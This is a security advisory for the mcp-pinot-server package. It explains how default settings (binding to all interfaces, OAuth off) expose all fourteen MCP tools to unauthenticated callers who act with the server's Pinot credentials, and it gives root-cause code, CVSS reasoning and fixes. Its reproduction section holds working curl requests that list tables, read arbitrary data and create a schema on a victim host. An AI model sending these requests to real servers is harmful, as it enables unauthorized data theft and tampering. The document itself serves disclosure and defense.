PT-2026-53492 · Pypi · Mcp-Pinot-Server
Publicado
2026-06-29
·
Atualizado
2026-06-29
CVSS v3.1
10
Crítica
| Vetor | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
Resolution
The fix changes the default HTTP bind host to
127.0.0.1, refuses non-loopback HTTP/HTTPS exposure unless OAuth is enabled, makes Helm exposure opt-in and OAuth-gated, and adds parser-backed single-statement read-only validation for read-query.CVSS evaluation
Reviewed on 2026-05-25. The advisory remains Critical with
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0.Rationale:
| Metric | Value | Reason |
|---|---|---|
| AV | Network | The default HTTP server bound to 0.0.0.0:8080 and accepted remote HTTP requests. |
| AC | Low | Exploitation required only a direct MCP tool call. |
| PR | None | OAuth was disabled by default. |
| UI | None | No user interaction was required. |
| S | Changed | The vulnerable MCP server used its server-side credentials to act on the separate Pinot cluster security boundary. |
| C | High | Unauthenticated callers could read table data and cluster metadata through server-side Pinot credentials. |
| I | High | Unauthenticated callers could create or update schemas and table configs where the server-side account had those privileges. |
| A | High | Expensive queries and configuration mutations could degrade or disrupt Pinot availability. |
Unauthenticated tool invocation via default oauth enabled=False + host 0.0.0.0 bind
Summary
mcp-pinot v3.0.1 (and earlier) defaults to running an HTTP MCP server bound to 0.0.0.0:8080 with no authentication enabled. All MCP tools, including SQL query execution, schema creation, and table-config mutation, are reachable by any network-adjacent caller. The server proxies these calls using server-side Pinot credentials, producing a confused-deputy condition that yields full read/write access to the configured Pinot cluster.Affected versions
- All releases on
main, confirmed in tags v2.1.0 through v3.0.1. - Affected files:
mcp pinot/server.py,mcp pinot/config.py.
Root cause
Three defaults compose to produce unauthenticated network exposure:
1. Auth is opt-in and defaults to off (
mcp pinot/config.py:64,328):python
@dataclass
class ServerConfig:
...
oauth enabled: bool = False
...
def load server config() -> ServerConfig:
return ServerConfig(
...
oauth enabled=os.getenv("OAUTH ENABLED", "false").lower() == "true",
...
)2. Auth construction is gated by
oauth enabled (mcp pinot/server.py:26-46):python
auth = None
if server config.oauth enabled:
oauth config = load oauth config()
token verifier = JWTVerifier(...)
auth = OAuthProxy(...)
mcp = FastMCP("Pinot MCP Server", auth= auth)When
oauth enabled is false (default), auth stays None and FastMCP registers all @mcp.tool endpoints with no authentication.3. Default bind is all interfaces on a well-known port (
mcp pinot/config.py:60-61):python
host: str = "0.0.0.0"
port: int = 8080The HTTP transport in
server.py:263-268 uses these values directly. Any operator following the README's HTTP transport instructions (uv pip install, .env from .env.example, run) ends up with a network-reachable MCP server with no auth.Confused-deputy
The Pinot client uses server-side credentials loaded from environment variables (
mcp pinot/config.py:285-294, 300-315). When an unauthenticated MCP caller invokes read query or any other tool, the request is executed with the server's PINOT TOKEN or PINOT USERNAME/PINOT PASSWORD, which is typically a privileged service account. The MCP server effectively launders the caller's lack of identity into the server's privileges against the upstream cluster.Exposed tools
All 14 tools in
mcp pinot/server.py are exposed without auth in the default configuration:| Tool | Impact when unauthenticated |
|---|---|
read query | Arbitrary SELECT against any table allowed by server-side filter (or all tables if no filter) |
list tables | Enumerate cluster schemas |
table details, segment list, segment metadata details, tableconfig schema details, index column details, get schema, get table config | Read cluster metadata |
create schema, update schema | Create or mutate Pinot schemas |
create table config, update table config | Create or mutate table configurations |
reload table filters | Reload server filter file; response leaks previous filters and new filters lists |
test connection | Cluster diagnostics including host, port, scheme, database, and auth-mode |
Reproduction
Minimal reproduction against a default-configured
mcp-pinot v3.0.1 instance running on http://victim:8080/mcp:bash
# 1. Enumerate tables (no Authorization header)
curl -X POST http://victim:8080/mcp
-H 'Content-Type: application/json'
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{"name":"list tables","arguments":{}},
"id":1
}'
# 2. Read arbitrary table contents (server forwards using its own Pinot credentials)
curl -X POST http://victim:8080/mcp
-H 'Content-Type: application/json'
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{
"name":"read query",
"arguments":{"query":"SELECT * FROM <table> LIMIT 100"}
},
"id":2
}'
# 3. Create a new schema (write privileges)
curl -X POST http://victim:8080/mcp
-H 'Content-Type: application/json'
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{
"name":"create schema",
"arguments":{
"schemaJson":"{"schemaName":"attacker schema","dimensionFieldSpecs":[{"name":"id","dataType":"STRING"}]}"
}
},
"id":3
}'Severity (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical| Metric | Value | Reason |
|---|---|---|
| AV (Attack Vector) | Network | Server defaults to bind on 0.0.0.0:8080 |
| AC (Attack Complexity) | Low | No special conditions, single HTTP request |
| PR (Privileges Required) | None | No authentication required in default config |
| UI (User Interaction) | None | Direct unauthenticated call |
| S (Scope) | Changed | Vulnerable MCP component grants access to a separate Pinot cluster (different security authority) |
| C (Confidentiality) | High | Full read of any table data the server-side account can reach |
| I (Integrity) | High | Schema and table-config writes via create schema, update schema, create table config, update table config |
| A (Availability) | High | Heavy queries, malformed configs, or schema overrides can degrade or break the cluster |
If the operator restricts the bind address to
127.0.0.1 via MCP HOST, AV drops to Local and the score reduces. But this is not the documented default.Suggested remediation
Two independent hardenings, both recommended:
A. Refuse to start in an insecure default, in
server.py main(), fail-closed when:transport != "stdio"server config.oauth enabledisFalseserver config.hostis not a loopback address (e.g. not in{"127.0.0.1", "::1", "localhost"})
Sample:
python
def is loopback(host: str) -> bool:
return host in {"127.0.0.1", "::1", "localhost"}
def main():
...
if server config.transport != "stdio" and not server config.oauth enabled and not is loopback(server config.host):
raise SystemExit(
"Refusing to start: HTTP transport bound to non-loopback host "
f"({server config.host}) without OAuth. Set OAUTH ENABLED=true or "
"set MCP HOST=127.0.0.1 for local-only access."
)
...B. Default
oauth enabled to True and require explicit opt-out for local development. This matches the principle of secure-by-default for network-facing services.C. Document the threat model in README under a "Production deployment" section, including:
- Explicit warning that the server should not be exposed to untrusted networks without OAuth
- Recommendation to set
MCP HOST=127.0.0.1for stdio/local-only deployments
Resources
mcp pinot/server.pylines 26-46, 248-269mcp pinot/config.pylines 56-65, 318-330- FastMCP
authparameter behavior whenNone: https://github.com/jlowin/fastmcp - The Register, May 13 2026: MCP database flaws across Doris, Pinot, RDS
Reporter
Independent security researcher. Disclosed via GitHub Security Advisory, 2026-05-23.
Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Mcp-Pinot-Server